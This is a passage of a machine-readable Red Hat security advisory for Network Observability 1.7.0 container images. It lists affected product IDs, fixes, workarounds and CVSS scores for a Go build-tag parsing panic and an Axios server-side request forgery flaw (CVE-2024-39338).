"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-39338", cwe: { id: "CWE-918", name: "Server-Side Request Forgery (SSRF)", }, discovery_date: "2024-08-13T17:21:32.774718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2304369", }, ], notes: [ { category: "description", text: "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.", title: "Vulnerability description", }, { category: "summary", text: "axios: axios: Server-Side Request Forgery", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-39338", }, { category: "external", summary: "RHBZ#2304369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304369", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-39338", url: "https://www.cve.org/CVERecord?id=CVE-2024-39338", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", }, { category: "external", summary: "https://github.com/axios/axios/releases", url: "https://github.com/axios/axios/releases", }, { category: "external", summary: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", url: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", }, ], release_date: "2024-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: 